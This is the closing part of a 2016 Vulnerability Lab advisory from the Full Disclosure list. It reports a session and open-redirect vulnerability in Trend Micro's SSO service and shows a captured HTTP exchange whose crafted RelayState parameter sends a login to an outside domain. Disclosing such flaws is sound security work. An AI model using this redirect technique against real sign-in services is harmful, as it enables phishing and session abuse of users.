      Content-Type[text/html; charset=UTF-8]



GET https://yahoo.com/my_account/ Load Flags[LOAD_DOCUMENT_URI 
LOAD_REPLACE  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[382] Mime
Type[text/html]
   Request Headers:
      Host[yahoo.com]
      User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]
     
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate, br]
     
Referer[https://sso1.trendmicro.com/signin/module.php/myaccount/loginuserpass.php?AuthState=_d78a8d5cb1b42574c7b94deeb9d15199caf5781311%3Ahttps%3A%2F%2Fsso1.trendmicro.com%2Fsignin%2Ftmsaml%2Fidp%2FSSOService.php%3Fspentityid%3Dmyaccount-sp%26cookieTime%3D1454068202%26RelayState%3Dhttps%253A%252F%252Fyahoo.com%252Fmy_account%252F]
      Cookie[B=]
      Connection[keep-alive]
   Response Headers:
      Date[Fri, 29 Jan 2016 11:52:31 GMT]
      Via[https/1.1 ir6.fp.ne1.yahoo.com (ApacheTrafficServer)]
      Server[ATS]
      Location[https://www.yahoo.com/my_account/]
      Content-Type[text/html]
      Content-Language[en]
      Cache-Control[no-store, no-cache]
     
y-trace[BAEAQAAAAAAmoBYDWfT3qwAAAAAAAAAAbpfxk8XLzrgAAAAAAAAAAAAFKnerkc.NAAUqd6uR22UgXJ6WAAAAAA--]
      Content-Length[382]
      X-Firefox-Spdy[h2]


Security Risk:
==============
The security risk of the session web and redirect vulnerability in the
trend micro sso online service web-application is estimated as high.
(CVSS 6.5)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] – Hadji Samir [Evolution
Security GmbH]
[http://www.vulnerability-lab.com/show.php?user=Hadji%20Samir]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability
for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental,
consequential loss of business profits or special damages, even if
Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages.
Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not
apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with
fraud/stolen material.

Domains:    www.vulnerability-lab.com       - www.vuln-lab.com       
                   - www.evolution-sec.com
Contact:    admin@...nerability-lab.com     -
research@...nerability-lab.com                    - admin@...lution-sec.com
Section:    magazine.vulnerability-db.com    -
vulnerability-lab.com/contact.php                   -
evolution-sec.com/contact
Social:        twitter.com/#!/vuln_lab         -
facebook.com/VulnerabilityLab                    -
youtube.com/user/vulnerability0lab
Feeds:        vulnerability-lab.com/rss/rss.php    -
vulnerability-lab.com/rss/rss_upcoming.php           -
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php      -
vulnerability-lab.com/list-of-bug-bounty-programs.php    -
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other media, are
reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or
managers. To record, list (feed), modify, use or edit our material contact
(admin@...nerability-lab.com or research@...nerability-lab.com) to get a
permission.

                Copyright © 2016 | Vulnerability Laboratory - [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@...nerability-lab.com




_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ